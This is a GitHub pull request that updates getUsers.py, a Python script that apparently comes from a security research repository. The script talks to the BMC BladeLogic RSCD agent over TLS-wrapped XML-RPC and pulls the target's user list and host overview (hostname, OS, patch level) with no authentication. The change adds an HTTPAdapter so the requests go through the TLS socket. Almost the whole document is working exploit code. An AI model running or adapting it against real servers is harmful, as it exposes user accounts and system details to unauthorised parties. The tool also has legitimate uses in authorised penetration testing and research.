### PR TITLE
Added HTTPAdapter to force XMLRPC request to go inside the TLS channel

### DIFF
--- a/bmc_bladelogic/getUsers.py
+++ b/bmc_bladelogic/getUsers.py
@@ -7,23 +7,43 @@ import sys
 import requests
 import argparse
 import xml.etree.ElementTree as ET
-from requests.packages.urllib3 import PoolManager, HTTPConnectionPool
-#If you encounter problems with import, try to comment the previous line and use the following one instead
-#from urllib3 import PoolManager, HTTPConnectionPool, connectionpool
-try:
-    from http.client import HTTPConnection
-except ImportError:
-    from httplib import HTTPConnection
-
+import httplib
+from requests.packages.urllib3 import PoolManager
+from requests.packages.urllib3.connection import HTTPConnection
+from requests.packages.urllib3.connectionpool import HTTPConnectionPool
+from requests.adapters import HTTPAdapter
+        
 class MyHTTPConnection(HTTPConnection):
+    def __init__(self, unix_socket_url, timeout=60):
+        HTTPConnection.__init__(self, HOST, timeout=timeout)
+        self.unix_socket_url = unix_socket_url
+        self.timeout = timeout
+
     def connect(self):
         self.sock = wrappedSocket
-        if self._tunnel_host:
-            self._tunnel()
 
-requests.packages.urllib3.connectionpool.HTTPConnection = MyHTTPConnection
-#If you used the alternative import, comment the previous line and uncomment the following instead
-#connectionpool.HTTPConnection = MyHTTPConnection
+
+class MyHTTPConnectionPool(HTTPConnectionPool):
+    def __init__(self, socket_path, timeout=60):
+        HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
+        self.socket_path = socket_path
+        self.timeout = timeout
+        
+    def _new_conn(self):
+        return MyHTTPConnection(self.socket_path, self.timeout)
+
+
+class MyAdapter(HTTPAdapter):
+    def __init__(self, timeout=60):
+        super(MyAdapter, self).__init__()
+        self.timeout = timeout
+
+    def get_connection(self, socket_path, proxies=None):
+        return MyHTTPConnectionPool(socket_path, self.timeout)
+
+    def request_url(self, request, proxies):
+        return request.path_url
+
 
 def optParser():
 	parser = argparse.ArgumentParser(description="Retrieving system users with BMC BladeLogic Server Automation RSCD agent")
@@ -43,6 +63,8 @@ getNext="""<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>DAAL.as
 
 closeAsset="""<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>DAAL.assetStreamClose</methodName><params><param><value><struct><member><name>streamID</name><value><struct><member><name>sessionId</name><value><i4>2</i4></value></member></struct></value></member></struct></value></param></params></methodCall>"""
 
+getHostOverview="""<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.getHostOverview</methodName></methodCall>"""
+
 options=optParser()
 PORT=options.port
 HOST=options.host
@@ -52,40 +74,66 @@ sock.connect((HOST, PORT))
 
 # Initial packet which will trigger XMLRPC communication
 sock.sendall("TLSRPC")
+
+# Create TLS tunnel
 wrappedSocket = ssl.wrap_socket(sock)
 
+# Use our existing socket for all future HTTP requests
+adapter = MyAdapter()
+s = requests.session()
+s.mount("http://", adapter)
+#s.mount("https://", adapter)
+
 print "Sending intro..."
-r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=init)
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=init)
 #print r.status_code
-r.content
+#print r.content
 print "Getting version..."
-r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getVersion)
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getVersion)
 #print r.status_code
 #print r.content
 rootVersion = ET.fromstring(r.content)
 print "========================="
-print "Major version: " + rootVersion[0][0][0][0][0][1].text
-print "Minor version: " + rootVersion[0][0][0][0][1][1].text
-print "Patch version: " + rootVersion[0][0][0][0][2][1].text
+print "Major version   : " + rootVersion[0][0][0][0][0][1].text
+print "Minor version   : " + rootVersion[0][0][0][0][1][1].text
+print "Patch version   : " + rootVersion[0][0][0][0][2][1].text
 print "Platform version: " + rootVersion[0][0][0][0][3][1].text
 print "=========================\n"
 
-print "Sending request for users...\n"
-r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getUsers)
+print "Getting host overview..."
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getHostOverview)
 #print r.status_code
-r.content
-r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext)
+#print r.content
+rootOverview = ET.fromstring(r.content)
+print "=================================================="
+print "Agent instal dir: " + rootOverview[0][0][0][0][ 0][1].text
+print "Licensed?       : " + ("false" if (int(rootOverview[0][0][0][0][1][1][0].text) == 0) else "true")
+print "Repeater?       : " + ("false" if (int(rootOverview[0][0][0][0][11][1][0].text) == 0) else "true")
+print "Hostname        : " + rootOverview[0][0][0][0][ 5][1].text
+print "Netmask         : " + rootOverview[0][0][0][0][12][1].text
+print "CPU architecture: " + rootOverview[0][0][0][0][ 9][1].text
+print "Platform (OS)   : " + rootOverview[0][0][0][0][13][1].text
+print "OS version      : " + rootOverview[0][0][0][0][14][1].text
+print "OS architecture : " + rootOverview[0][0][0][0][ 2][1].text
+print "OS release      : " + rootOverview[0][0][0][0][10][1].text
+print "Patch level     : " + rootOverview[0][0][0][0][ 6][1].text
+print "==================================================\n"
+
+print "Sending request for users...\n"
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getUsers)
+#print r.status_code
+#print r.content
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext)
 #print r.status_code
 with open("./users.xml", "w") as text_file:
 	text_file.write(r.content)
 
-r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext)
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=getNext)
 #print r.status_code
-r.content
-r=requests.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=closeAsset)
+#print r.content
+r=s.post('http://'+HOST+':'+str(PORT)+'/xmlrpc',data=closeAsset)
 #print r.status_code
-r.content
-
+#print r.content
 
 # Parsing the response
 # If parsing does not work correctly, the users' information still can be found in the saved users.xml file
@@ -101,6 +149,8 @@ while ind:
 	count+=1
 
 print "Number of users found: " + str(count) + "\n"
+#raw_input("Press [Enter] to print users...")
+
 
 for i in range(0,count):
 	print "User " + str(i) + ": " + root[0][0][0][0][0][1][0][0][i][0][0][1][0][2][1].text + "\n........................"


### PR DESCRIPTION
Apologies for the delay, intended to do this last year, but completely forgot. Luckily ran into my modified version while doing some cleanup.

Basically this fixes the issue I raised here: https://github.com/ernw/insinuator-snippets/issues/3

For some reason the XMLRPC requests were not being sent inside the TLS channel, I have no idea  why tbh. The only fix I found was to create an HTTPAdapter. That forces the XMLRPC request to go inside the TLS channel we've created.

Cheers